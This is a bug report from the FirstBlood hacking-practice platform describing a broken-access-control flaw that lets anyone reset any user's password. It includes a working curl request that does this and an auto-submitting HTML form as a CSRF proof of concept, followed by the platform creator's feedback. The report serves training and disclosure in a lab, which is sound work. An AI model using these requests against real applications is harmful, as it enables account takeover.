FirstBlood-#386Any user can update another's user password via /drpanel/drapi/editpassword.php endpoint
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, panya Level 7 reported:

Steps to reproduce:

  1. Register a doctor (e.g. with a name admin and test as an invitation code).
  2. Don't login with the provided credentials.
  3. Update the user password via this request:
    curl -X POST 'https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php' --data-raw 'username=admin'

    it works for any user and returns the newly generated password of the provided username user.

    Password updated - s3mKUOhRTFvEo6Z

Actual result:

The password of the admin user will be updated to s3mKUOhRTFvEo6Z. An attacker could login with this password and take over the account.

Expected result:

The /drpanel/drapi/editpassword.php endpoint should properly validate user role and should be accessible only for admins.

UPDATE:

I'm not sure if it is a different bug or not, but this endpoint also doesn't have any CSRF protection, it could be exploited via this basic PoC:

<body onload="document.forms[0].submit()">
  <form method="post" action="https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php">
    <input type="hidden" name="username" value="admin">
  </form>
</body>

By visiting a html page with this code, admin user's password will be updated to a newly generated value.

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

Parameter: username

Payload: admin


FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

Report Feedback

@zseano

Creator & Administrator


Hi panya, nice find! The intended issue was to be able to login as 'drAdmin' which could be found from user enumeration (different error message produced), or from FirstBlood v1. However you are correct you can update any users password, but the 'admin' account doesn't actually have any special powers. drAdmin is the root admin